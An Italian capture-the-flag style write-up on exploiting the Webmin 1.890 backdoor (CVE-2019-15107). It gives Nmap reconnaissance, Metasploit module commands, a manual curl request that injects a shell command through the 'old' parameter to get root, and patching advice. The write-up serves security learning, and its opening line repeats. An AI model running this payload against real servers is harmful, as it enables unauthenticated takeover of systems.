
Obiettivo della ricerca: condurre un'analisi completa e lo sfruttamento riuscito di una vulnerabilità di Remote Code Execution (RCE) in Webmin versione 1.890 (CVE-2019-15107), ottenendo infine il pieno controllo del sistema target.
Obiettivo della ricerca: Condurre un'analisi completa e lo sfruttamento riuscito di una vulnerabilità di Remote Code Execution (RCE) in Webmin versione 1.890 (CVE-2019-15107), ottenendo infine il pieno controllo del sistema target.
Metodologia:
Ricognizione iniziale:
Scansione di rete eseguita con Nmap:
bash nmap -sV -sC -A -p- 10.201.105.185 Identificato il servizio Webmin 1.890 in esecuzione sulla porta 10000
Analisi della vulnerabilità:
Investigato il meccanismo della vulnerabilità in password_change.cgi
Confermata la possibilità di esecuzione arbitraria di comandi senza autenticazione
Sfruttamento:
Implementati due vettori d'attacco:
Utilizzando Metasploit Framework:
bash use exploit/linux/http/webmin_backdoor set RHOSTS 10.201.105.185 set LHOST tun0 exploit Sfruttamento manuale tramite curl:
bash curl -k "https://10.201.105.185:10000/password_change.cgi" -d "user=root&pam=&expired=2&old=test|id&new1=test&new2=test" Post-sfruttamento:
Ottenuta una shell root interattiva
Condotta l'analisi del filesystem
Trovati i file flag:
bash /home/dark/user.txt /root/root.txt Risultati:
Sfruttata con successo la vulnerabilità CVE-2019-15107
Ottenuti privilegi root completi sul sistema
Dimostrata l'importanza critica degli aggiornamenti software tempestivi
Conclusioni tecniche:
La vulnerabilità permette l'esecuzione arbitraria di comandi tramite l'iniezione del parametro 'old'
La mancanza di controlli di autenticazione lo rende particolarmente pericoloso
La versione 1.890 contiene una backdoor corretta nelle versioni successive
Raccomandazioni di sicurezza:
Aggiornamento immediato alla versione corrente di Webmin
Limitare l'accesso al pannello di amministrazione per IP
Audit di sicurezza regolari delle applicazioni web
Direzioni di ricerca future:
Analisi di altre vulnerabilità di Webmin
Sviluppo di exploit personalizzato senza Metasploit
Investigazione di tecniche di persistenza in sistemi compromessi
Questo caso di studio dimostra l'importanza critica degli aggiornamenti tempestivi del sistema e la necessità di un monitoraggio continuo delle vulnerabilità nel software distribuito. La ricerca fornisce approfondimenti pratici sulle moderne tecniche di sfruttamento delle applicazioni web, sottolineando al contempo i principi fondamentali di sicurezza.